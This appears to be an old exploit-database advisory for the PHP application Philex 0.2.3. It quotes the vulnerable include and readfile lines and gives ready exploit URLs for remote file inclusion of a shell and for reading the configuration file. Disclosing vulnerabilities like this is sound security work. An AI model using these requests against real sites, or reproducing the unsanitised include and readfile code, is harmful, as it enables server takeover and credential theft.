Philex 0.2.3 - Remote File Inclusion / File Disclosure

EDB-ID:

3552


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-03-23


######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# milw0rm.com [2007-03-23]